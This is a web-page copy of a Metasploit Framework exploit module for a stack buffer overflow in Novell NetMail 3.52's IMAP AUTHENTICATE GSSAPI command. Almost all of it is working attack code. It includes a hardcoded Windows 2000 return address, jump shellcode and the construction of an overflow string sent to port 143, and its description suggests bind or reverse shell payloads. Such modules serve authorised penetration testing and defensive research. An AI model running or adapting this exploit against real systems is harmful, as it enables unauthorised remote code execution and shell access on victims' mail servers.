CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/novell_netmail_auth.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE

16
        GSSAPI command. By sending an overly long string, an attacker can overwrite the

17
        buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp

18
        or windows/shell_reverse_tcp allows for the most reliable results.

19
      },

20
      'Author'         => [ 'MC' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'OSVDB', '55175' ]

25
        ],

26
      'Privileged'     => true,

27
      'DefaultOptions' =>

28
        {

29
          'EXITFUNC' => 'thread',

30
          'AllowWin32SEH' => true

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 850,

35
          'BadChars' => "\x00\x20\x2c\x3a\x40",

36
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",

37
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,

38
        },

39
      'Platform'       => 'win',

40
      'Targets'        =>

41
        [

42
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],

43
        ],

44
      'DisclosureDate' => '2007-01-07',

45
      'DefaultTarget'  => 0))

46


47
    register_options( [ Opt::RPORT(143) ])

48
  end

49


50
  def exploit

51
    connect

52
    sock.get_once

53


54
    jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"

55
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"

56
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

57


58
    sploit  =  "A001 AUTHENTICATE GSSAPI\r\n"

59
    sploit  << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"

60
    sploit  << rand_text_alpha_upper(2) + [target.ret].pack('V')

61
    sploit  << make_nops(8) + jmp + rand_text_alpha_upper(700)

62


63
    print_status("Trying target #{target.name}...")

64
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

65


66
    handler

67
    disconnect

68
  end

69
end

70


71